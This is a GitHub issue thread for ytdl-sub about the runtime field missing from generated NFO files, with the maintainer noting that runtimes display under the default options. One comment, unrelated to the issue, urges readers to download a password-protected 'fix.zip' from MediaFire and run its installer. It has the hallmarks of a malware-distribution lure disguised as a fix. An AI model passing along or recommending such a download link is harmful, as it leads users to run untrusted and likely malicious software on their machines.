### ISSUE TITLE
Missing runtime in nfo file

### ISSUE THREAD

**Issue by jlaffaye** [jmbannon/ytdl-sub#1039]
```
yt-dlp             2024.7.25
ytdl-sub           2024.7.26
Preset: Jellyfin TV Show by Date
```

The runtime is missing from the generated nfo file.

Ideally, the runtime should be the duration of the video after any processing like sponsorblock

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jmbannon** [comment]
This metadata can be pulled from the video file itself, why does it need to be in the NFO?
According to the Kodi docs, `runtime` is unused: https://kodi.wiki/view/NFO_files/TV_shows

**Comment by jlaffaye** [comment]
Jellyfin does not display the duration of the video when its missing.
I guess when a NFO is present its expecting everything to be present and does not fallback to checking the video file ?

**Comment by jmbannon** [comment]
![image](https://github.com/user-attachments/assets/8411f9b6-406c-4972-b3f3-34d493ec510e)
I'm able to see runtimes with the default NFO options, perhaps its the client you are using?
